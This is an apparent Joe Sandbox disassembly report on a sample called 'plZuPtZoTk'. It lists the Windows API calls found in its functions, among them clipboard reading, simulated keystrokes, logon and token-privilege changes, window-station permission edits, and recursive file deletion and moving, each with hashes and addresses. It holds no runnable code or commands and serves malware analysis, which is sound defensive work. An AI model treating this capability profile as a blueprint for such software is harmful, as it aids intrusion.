                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                      • String ID: @GUI_DRAGID$F
                                                                      • API String ID: 3429851547-4164748364
                                                                      • Opcode ID: 4d625834d86e6307222d683a0d2d043641c38992f9329f66ddeac9f65158ff2b
                                                                      • Instruction ID: b157d48536fc23fac54bba36084730a8d08485f4d1c636a8a5795a0f34f45155
                                                                      • Opcode Fuzzy Hash: 4d625834d86e6307222d683a0d2d043641c38992f9329f66ddeac9f65158ff2b
                                                                      • Instruction Fuzzy Hash: 7C429C70204301EFDB21CF64CD44BABBBE5FF48321F100A1AFA998B6A1D731A959DB41
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00A548F3
                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00A54908
                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00A54927
                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00A5494B
                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00A5495C
                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00A5497B
                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00A549AE
                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00A549D4
                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00A54A0F
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A54A56
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00A54A7E
                                                                      • IsMenu.USER32(?), ref: 00A54A97
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A54AF2
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A54B20
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A54B94
                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00A54BE3
                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00A54C82
                                                                      • wsprintfW.USER32 ref: 00A54CAE
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A54CC9
                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00A54CF1
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A54D13
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A54D33
                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00A54D5A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                      • String ID: %d/%02d/%02d
                                                                      • API String ID: 4054740463-328681919
                                                                      • Opcode ID: 4c379557ef5885afde41ed9b74fa7d18026b7b2688b222d31e454a102b165da6
                                                                      • Instruction ID: 6d011859bd0b53c2d17dc7a7f11ac9e86c2b4ff32689212c8a93c7d54847fcf3
                                                                      • Opcode Fuzzy Hash: 4c379557ef5885afde41ed9b74fa7d18026b7b2688b222d31e454a102b165da6
                                                                      • Instruction Fuzzy Hash: 9612FF71600304ABEB248F68CC49FAE7BB8FF89715F104119F916DA2A1D7789A89CB50
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 009DF998
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A1F474
                                                                      • IsIconic.USER32(00000000), ref: 00A1F47D
                                                                      • ShowWindow.USER32(00000000,00000009), ref: 00A1F48A
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00A1F494
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A1F4AA
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A1F4B1
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A1F4BD
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A1F4CE
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A1F4D6
                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00A1F4DE
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00A1F4E1
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A1F4F6
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00A1F501
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A1F50B
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00A1F510
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A1F519
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00A1F51E
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A1F528
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00A1F52D
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00A1F530
                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00A1F557
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 4125248594-2988720461
                                                                      • Opcode ID: 30fda21bc841c4dd628ed4c0504131f45447746d4ab5e16c0f8f4c4313af71a9
                                                                      • Instruction ID: ef30cebe8fa36e606d331dd529870a0ab961f8863b57b734cac50489cc8a7c1f
                                                                      • Opcode Fuzzy Hash: 30fda21bc841c4dd628ed4c0504131f45447746d4ab5e16c0f8f4c4313af71a9
                                                                      • Instruction Fuzzy Hash: 6F317271A80318BFEB21ABF55C4AFBF7E6DFB44B61F100065FA01E61D1D6B05D41AAA0
                                                                      APIs
                                                                        • Part of subcall function 00A216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A2170D
                                                                        • Part of subcall function 00A216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A2173A
                                                                        • Part of subcall function 00A216C3: GetLastError.KERNEL32 ref: 00A2174A
                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00A21286
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00A212A8
                                                                      • CloseHandle.KERNEL32(?), ref: 00A212B9
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A212D1
                                                                      • GetProcessWindowStation.USER32 ref: 00A212EA
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00A212F4
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A21310
                                                                        • Part of subcall function 00A210BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A211FC), ref: 00A210D4
                                                                        • Part of subcall function 00A210BF: CloseHandle.KERNEL32(?,?,00A211FC), ref: 00A210E9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 22674027-1027155976
                                                                      • Opcode ID: b48cc945de4ca86ad437a6f542d46a3b59bdb8f6643a716cc531bd6ccc7cb68b
                                                                      • Instruction ID: b89935e611fceeba11749a2de2f3141587dced50b2e2dddd547148f0d481bf5e
                                                                      • Opcode Fuzzy Hash: b48cc945de4ca86ad437a6f542d46a3b59bdb8f6643a716cc531bd6ccc7cb68b
                                                                      • Instruction Fuzzy Hash: 46817BB1A00319AFDF21EFA8EC49BEE7BB9FF04715F144129F915A61A0D7318A45CB60
                                                                      APIs
                                                                        • Part of subcall function 00A210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A21114
                                                                        • Part of subcall function 00A210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21120
                                                                        • Part of subcall function 00A210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A2112F
                                                                        • Part of subcall function 00A210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A20B9B,?,?,?), ref: 00A21136
                                                                        • Part of subcall function 00A210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A2114D
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A20BCC
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A20C00
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00A20C17
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00A20C51
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A20C6D
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00A20C84
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A20C8C
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00A20C93
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A20CB4
                                                                      • CopySid.ADVAPI32(00000000), ref: 00A20CBB
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A20CEA
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A20D0C
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A20D1E
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20D45
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20D4C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20D55
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20D5C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A20D65
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20D6C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00A20D78
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A20D7F
                                                                        • Part of subcall function 00A21193: GetProcessHeap.KERNEL32(00000008,00A20BB1,?,00000000,?,00A20BB1,?), ref: 00A211A1
                                                                        • Part of subcall function 00A21193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A20BB1,?), ref: 00A211A8
                                                                        • Part of subcall function 00A21193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A20BB1,?), ref: 00A211B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      • Opcode ID: 142d8ee716ac113be4dd55da1619efa903a442f0d406013106387ebf4ce7b07c
                                                                      • Instruction ID: 654301a1b1cdf3eee7568b1f6d23c56689028ffb2af4688341c5b2a38ecb1819
                                                                      • Opcode Fuzzy Hash: 142d8ee716ac113be4dd55da1619efa903a442f0d406013106387ebf4ce7b07c
                                                                      • Instruction Fuzzy Hash: 73713A7190132AAFDF10DFE8EC44FAEBBB8BF04311F144625E915A6192D771A906CF60
                                                                      APIs
                                                                      • OpenClipboard.USER32(00A5CC08), ref: 00A3EB29
                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A3EB37
                                                                      • GetClipboardData.USER32(0000000D), ref: 00A3EB43
                                                                      • CloseClipboard.USER32 ref: 00A3EB4F
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A3EB87
                                                                      • CloseClipboard.USER32 ref: 00A3EB91
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A3EBBC
                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00A3EBC9
                                                                      • GetClipboardData.USER32(00000001), ref: 00A3EBD1
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A3EBE2
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A3EC22
                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00A3EC38
                                                                      • GetClipboardData.USER32(0000000F), ref: 00A3EC44
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A3EC55
                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A3EC77
                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A3EC94
                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A3ECD2
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A3ECF3
                                                                      • CountClipboardFormats.USER32 ref: 00A3ED14
                                                                      • CloseClipboard.USER32 ref: 00A3ED59
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                      • String ID:
                                                                      • API String ID: 420908878-0
                                                                      • Opcode ID: 7f09664d53b06bb57596f25074de3dcb31f44b2466a778c3e23657aa398be18b
                                                                      • Instruction ID: 34fbf24ac82c78d024f983d4842a55e289694efd628580e6f56d50aacbe297aa
                                                                      • Opcode Fuzzy Hash: 7f09664d53b06bb57596f25074de3dcb31f44b2466a778c3e23657aa398be18b
                                                                      • Instruction Fuzzy Hash: 6561AB34204301AFD300EF64D899F6AB7A8BF84764F14855DF4569B2E2CB31ED46CBA2
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A369BE
                                                                      • FindClose.KERNEL32(00000000), ref: 00A36A12
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A36A4E
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A36A75
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A36AB2
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A36ADF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                      • API String ID: 3830820486-3289030164
                                                                      • Opcode ID: f1919c74aa35926b86e6ac5bbb146c618d6dd47ab191c8be71689ae2954283ec
                                                                      • Instruction ID: ae8354c9fda06661d9ea636d026f3aac5514afe73d5f45d82bd1aa5c43c55f3b
                                                                      • Opcode Fuzzy Hash: f1919c74aa35926b86e6ac5bbb146c618d6dd47ab191c8be71689ae2954283ec
                                                                      • Instruction Fuzzy Hash: 28D13E72908340AFC710EBA4D996FABB7E8AF88704F04491DF589D6191EB74DA44CB62
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00A39663
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00A396A1
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00A396BB
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00A396D3
                                                                      • FindClose.KERNEL32(00000000), ref: 00A396DE
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00A396FA
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A3974A
                                                                      • SetCurrentDirectoryW.KERNEL32(00A86B7C), ref: 00A39768
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A39772
                                                                      • FindClose.KERNEL32(00000000), ref: 00A3977F
                                                                      • FindClose.KERNEL32(00000000), ref: 00A3978F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      • Opcode ID: 2d821c0f5210965fa5a034f7c4c69c74bf00a524e1ae152af65fee6c58ac1c8a
                                                                      • Instruction ID: 69f828b8d6d81c4963f436a04e0a295d3a66f88f9f83bd74bb2bcfebcdad8f15
                                                                      • Opcode Fuzzy Hash: 2d821c0f5210965fa5a034f7c4c69c74bf00a524e1ae152af65fee6c58ac1c8a
                                                                      • Instruction Fuzzy Hash: 9C31AB3264171A7EDB10EFB4DC49AEF77ACAF49331F104166F915E21A0EBB4DE458A20
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00A397BE
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00A39819
                                                                      • FindClose.KERNEL32(00000000), ref: 00A39824
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00A39840
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A39890
                                                                      • SetCurrentDirectoryW.KERNEL32(00A86B7C), ref: 00A398AE
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A398B8
                                                                      • FindClose.KERNEL32(00000000), ref: 00A398C5
                                                                      • FindClose.KERNEL32(00000000), ref: 00A398D5
                                                                        • Part of subcall function 00A2DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A2DB00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: 4f4445430a492298e637714712c12b56a80b962a1c0a3201ee452b95e0cb8608
                                                                      • Instruction ID: 45cdfbd4729cf8a604bcc75ab81d94b60a348eb46ef99db182f7c547fa5e59ed
                                                                      • Opcode Fuzzy Hash: 4f4445430a492298e637714712c12b56a80b962a1c0a3201ee452b95e0cb8608
                                                                      • Instruction Fuzzy Hash: CA31AE3254071A7EEB10EFA4EC48ADF77ACAF86335F104565F914A21A1DBB0DE85CA60
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 00A38257
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A38267
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A38273
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A38310
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A38324
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A38356
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A3838C
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A38395
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                      • String ID: *.*
                                                                      • API String ID: 1464919966-438819550
                                                                      • Opcode ID: e33b5a944085179654e49efb61a0ea4e1338e365bb77158375b011179fc0a37b
                                                                      • Instruction ID: 3522f84bf16a1b8165ca86eddcd672524166c7b9d91ad70224363dd223f2bf20
                                                                      • Opcode Fuzzy Hash: e33b5a944085179654e49efb61a0ea4e1338e365bb77158375b011179fc0a37b
                                                                      • Instruction Fuzzy Hash: 0B6169B25043459FC710EF64C841AAEB3E8FF89324F04892EF99997251DB35E945CB92
                                                                      APIs
                                                                        • Part of subcall function 009C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C3A97,?,?,009C2E7F,?,?,?,00000000), ref: 009C3AC2
                                                                        • Part of subcall function 00A2E199: GetFileAttributesW.KERNEL32(?,00A2CF95), ref: 00A2E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A2D122
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00A2D1DD
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00A2D1F0
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A2D20D
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A2D237
                                                                        • Part of subcall function 00A2D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00A2D21C,?,?), ref: 00A2D2B2
                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00A2D253
                                                                      • FindClose.KERNEL32(00000000), ref: 00A2D264
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 1946585618-1173974218
                                                                      • Opcode ID: 3daa799567e0465454a22b776b4a1080549ff961c09951c634ff7ef4b2bc36b7
                                                                      • Instruction ID: a8152690841d442b4e9df22ddbc56aebf67652ce227d7a30c24faef213853fa4
                                                                      • Opcode Fuzzy Hash: 3daa799567e0465454a22b776b4a1080549ff961c09951c634ff7ef4b2bc36b7
                                                                      • Instruction Fuzzy Hash: E8611931C0125DAECF05EBA4EA52EEDB7B5AF55300F248169E40277192EB30AF09CB61
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
